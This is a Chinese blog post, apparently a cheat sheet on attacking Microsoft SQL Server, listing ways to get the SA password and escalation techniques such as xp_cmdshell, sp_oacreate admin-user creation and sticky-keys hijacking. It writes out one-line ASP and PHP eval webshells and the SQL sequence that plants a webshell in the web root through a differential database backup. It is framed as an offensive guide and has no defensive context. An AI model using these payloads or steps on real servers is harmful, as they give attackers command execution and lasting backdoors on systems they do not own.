MSSQL 漏洞利用与提权
1、SA口令的获取
webshell或源代码的获取
源代码泄露
嗅探(用CAIN等工具嗅探1433数据库端口)
口令暴力破解
2、常见SQL server 提权命令
查看数据库的版本(select @@version;)
查看数据库所在服务器操作系统的参数
查看数据库启动的参数
查看数据库启动的时间
查看数据库服务器名和实例名
查看用户登录信息
查看数据库里所所有的存储工程和函数
查看数据库里用户和进程的信息
恢复存储过程
开启和关闭xp_cmdshell
xp_cmdshell执行命令
开启和关闭sp_oacreate
sp_oacreate删除文件
sp_oacreate复制文件
sp_oacreate移动文件
sp_oacreate添加管理员用户
开启和关闭sp_makeweblask\
wscript.shell执行命令
shell.applocation执行命令
开启和关闭openrowset
沙盒执行命令
注册表劫持粘贴键
sp_oacreate替换粘贴键
public提权操作
echo一句话后门(echo <%eval request(cmd)%> >d:\wwwroot\ok.asp echo <? php @eval($_POST[cmd]);?> >cmd.php)
在mssql 中查询password
3、通过数据库备份获取webshell
差异备份一句话木马
backup database [当前数据库名] to disk = 'c:\recycler\1.bak'
create table cmd (a image);
insert into cmd(a) values ('<%eval request("cmd")%>');
backup database [当前数据库名] to disk = '网站绝对路径' WITH DIFFERENTIAL,FORMAT--
LOG 备份一句话木马(......)
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 地球OL攻略 —— 某应届生求职总结
· 提示词工程——AI应用必不可少的技术
· Open-Sora 2.0 重磅开源!
· 周边上新:园子的第一款马克杯温暖上架